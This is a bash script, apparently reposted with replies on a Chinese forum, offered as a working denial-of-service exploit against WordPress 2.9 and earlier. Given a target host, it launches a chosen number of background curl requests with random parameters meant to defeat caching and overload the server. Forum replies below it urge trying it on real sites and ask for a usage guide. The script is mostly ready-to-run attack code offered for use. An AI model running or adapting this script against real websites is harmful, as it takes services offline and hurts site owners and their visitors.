0day Wordpress DOS <= 2.9
#!/bin/bash#
# Copyright (C) 2009 Emanuele Gentili < emgent@backtrack.it >
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
# WPd0s.sh
# This is a 0day DOS issue for Wordpress Core that use cache stressing with random
# parameter on multiple requests.
#
show_help(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " --usage show the exploit Usage"
echo " --prereq show the exploit Prerequisites"
echo " --credits show the exploit Credits"
echo " --help show the Help"
echo ""
echo "Emanuele Gentili <emgent@backtrack.it>"
}
show_credits(){
echo ""
echo " Emanuele 'emgent' Gentili"
echo " http://www.backtrack.it/~emgent/"
echo " emgent @ backtrack.it"
echo ""
}
show_prereq(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " Prerequeisites:"
echo " Bash (yeah because is cool.)"
echo " Curl"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
show_usage(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " usage $0 --host http://localhost/wordpress/ --requests 1000"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
# Bash
while [[ $# != 0 ]]; do
arg_name=$1; shift
case "$arg_name" in
--help|-?|-h) show_help; exit 0;;
--credits) show_credits; exit 0;;
--usage) show_usage; exit 0;;
--prereq) show_prereq; exit 0;;
--host) host=$1; shift;;
--requests) requests=$1; shift;;
*) echo "invalid option: $1"; show_help;exit 1;;
esac
done
[ -z "$host" ] && { show_help; exit 1; }
for random in `seq 1 $requests`; do
curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &
done
# 2009-12-30 enJoy. 哇,0day。。。。。。。。。。 去找几个站试试看 [b] [url=http://www.3ast.com.cn/redirect.php?goto=findpost&pid=63912&ptid=13249]1#[/url] [i]柔肠寸断[/i] [/b]
菜鸟完全看不懂!!
老大是不是可以给个中文利用方法{:Yem67:Y}
页:
[1]